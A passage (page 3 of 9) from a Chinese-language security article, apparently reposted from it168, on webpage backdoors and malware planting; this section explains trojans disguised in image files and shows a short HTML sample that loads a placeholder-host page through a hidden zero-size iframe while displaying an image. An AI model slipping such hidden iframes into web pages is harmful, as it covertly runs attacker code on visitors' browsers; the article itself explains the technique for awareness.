解析网页后门和挂马

新客网 XKER.COM 2008-03-06 来源：it168 甘肃老五收藏本文

3、图片伪装挂马
随着防毒技术的发展，黑手段也不停地更新，图片木马技术逃避杀毒监视的新技术，攻击者将类似： http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中，这些嵌入代码的图片都可以用工具生成，攻击者只需输入相关的选项就可以了，如图3。图片木马生成后，再利用代码调用执行，是比较新颖的一种挂马隐蔽方法，实例代码如：

    <html>
    <iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe>
    <img src="http://www.xxx.com/test.jpg"></center>
    </html>
    注：当用户打开http://www.xxx.com/test.htm是，显示给用户的是http://www.xxx.com/test.jpg，而http://www.xxx.com/test.htm网页代码也随之运行。（图3）

共9页: 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] 下一页

上一篇：[攻防手记]SQL存储过程带来的安全危险下一篇：轻松挖出恶意网站中藏的病毒

【收藏】【评论】【推荐】【投稿】【打印】【关闭】